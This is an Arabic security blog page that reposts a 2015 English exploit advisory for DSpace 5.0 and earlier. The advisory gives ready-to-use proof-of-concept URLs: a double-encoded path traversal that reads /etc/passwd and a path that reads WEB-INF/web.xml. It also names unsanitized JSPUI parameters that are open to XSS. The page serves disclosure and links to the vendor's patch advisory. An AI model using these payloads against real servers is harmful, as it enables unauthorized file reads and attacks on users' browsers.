محتوى تقني مميز في مجالات البرمجة، الأمن السيبراني، والذكاء الاصطناعي، مع شروحات عملية وأدوات مفيدة للمطورين والمهتمين بالتقنية

اشترك في الباقة المميزة واستمتع بتجربة خالية من الإعلانات!

هل سئمت من رؤية الإعلانات؟ مقابل 3 دولارات فقط شهريًا، يمكنك الاستمتاع بمحتوانا دون أي انقطاع. باشتراكك في الباقة المميزة، ستحصل على تجربة تصفح محسّنة وخالية تمامًا من الإعلانات.

$3 في الشهر

للطب تواصل عبر الايميل : khalil@shreateh.net
 
استغلال ثغرة في نظام DSpace للوصول إلى ملفات النظام الحساسة مثل /etc/passwd عبر تجاوز المسارات
اكتشفت إمكانية تنفيذ أكواد خبيثة والوصول إلى ملفات حساسة في DSpace 5.0، مما يشكل تهديدًا كبيرًا على خصوصية البيانات وأمن الخوادم

في عام 2015، أثناء تفاعلي مع نظام DSpace لإدارة المستودعات الرقمية (الإصدار 5.0 وما قبله)، اكتشفت مجموعة من الثغرات الأمنية التي كان من الممكن أن تُستغل بشكل خطير في بيئات الإنتاج. أولى هذه الثغرات كانت ثغرة تجاوز المسارات (Path Traversal)، حيث تمكنت من الوصول إلى ملفات حساسة مثل /etc/passwd عبر استخدام ترميز مزدوج للنقاط . في واجهة XMLUI.

كما اكتشفت ثغرات XSS (تنفيذ أوامر عبر المتصفح) في واجهة JSPUI، حيث تمكنت من إدخال أكواد JavaScript في مدخلات مثل filtertype وfiltername، مما كان سيسمح بتنفيذ أكواد خبيثة في متصفح أي مستخدم يزور صفحة متأثرة.
قمت بتوثيق هذه الثغرات وعرضها للعامة لرفع الوعي الأمني حول هذا النظام ولتشجيع المطورين على سد هذه الفجوات.

DSpace 5.x suffers from several vulnerabilities, including XSS, Path Traversal 

استغلال ثغرة في نظام DSpace للوصول إلى ملفات النظام الحساسة مثل /etc/passwd عبر تجاوز المسارات

Exploit Title: Dspace Multiple Vulnerabilities 

Date: 3/2/2015
Exploit Author: Khalil Shreateh
Software Link: http://demo.dspace.org/
Version: DSpace <= 5.0
Tested on: Windows 7
 
Quote: 
"DSpace open source software is a turnkey repository application used by more than 1000+ organizations and institutions worldwide to provide durable access to digital resources."
 
Vulnerabilities 

XMLUI (Cocoon/XSLT) - The XML / XSLT / Cocoon user interface

This version suffers from Path Traversal vulnerability, to exploit this vulnerability i used double encoding for the dot (.) 

so the ../  wil be %252e%252e/  

POC : 

http://TARGET/static/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

JSPUI (JSP) - traditional JSP-based interface 

A. Path Traversal Vulnerability

The first vulnerability in this version allows to read files on server .

POC : 
http://TARGET/handle/10673/1/WEB-INF/web.xml

B. Cross Site Scripting (XSS) Vulnerability

The second vulnerability in this version allows to execute arbitrary commands and display arbitrary content in a victim user's browser

The vulnerability exists in several varialbes

- filtertype

- filter_type_1

- filtername

- filter_field_1

All the above varialbes are not sanitized correctly . 

 

PATCH : 

Dspace team annoucement article : 
http://dspace.2283337.n4.nabble.com/DSPACE-SECURITY-ADVISORY-New-DSpace-5-1-4-3-and-3-4-releases-resolve-security-issues-in-XMLUI-and-JSI-td4676801.html

 

للدعم شارك مع اصدقائك